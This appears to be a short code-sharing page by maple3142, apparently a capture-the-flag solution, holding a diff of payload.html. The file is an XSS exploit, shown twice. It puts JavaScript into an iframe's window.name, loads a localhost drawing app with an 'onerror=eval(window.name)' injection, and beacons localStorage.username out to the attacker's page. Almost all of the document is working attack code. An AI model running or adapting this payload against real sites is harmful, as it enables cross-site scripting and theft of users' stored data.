maple3142 · March 30, 2022 00:18 · Alan-Liang · Mar 30, 2022 · maple3142 · Mar 30, 2022
diff --git a/payload.html b/payload.html
 <iframe srcdoc="none" id="frm"></iframe>
 <script>
 	frm.contentWindow.name = `
 (new Image()).src = '${location.href}?report=1&flag='+localStorage.username
 `.slice(1, -1)
 	frm.onload = () => {
 		console.log('loaded 1')
 		frm.onload = () => {
 			frm.onload = null
 			console.log('loaded 2')
 			setTimeout(() => {
 				frm.width = 800
 				frm.height = 400
 			}, 500)
 		}
 		frm.contentWindow.location = 'http://localhost:4000/drawing/peko#is=asd&onerror=eval(window.name)&src=peko'
 	}
 </script>
	<iframe srcdoc="none" id="frm"></iframe>
	<script>
	frm.contentWindow.name = `
	(new Image()).src = '${location.href}?report=1&flag='+localStorage.username
	`.slice(1, -1)
	frm.onload = () => {
	console.log('loaded 1')
	frm.onload = () => {
	frm.onload = null
	console.log('loaded 2')
	setTimeout(() => {
	frm.width = 800
	frm.height = 400
	}, 500)
	}
	frm.contentWindow.location = 'http://localhost:4000/drawing/peko#is=asd&onerror=eval(window.name)&src=peko'
	}
	</script>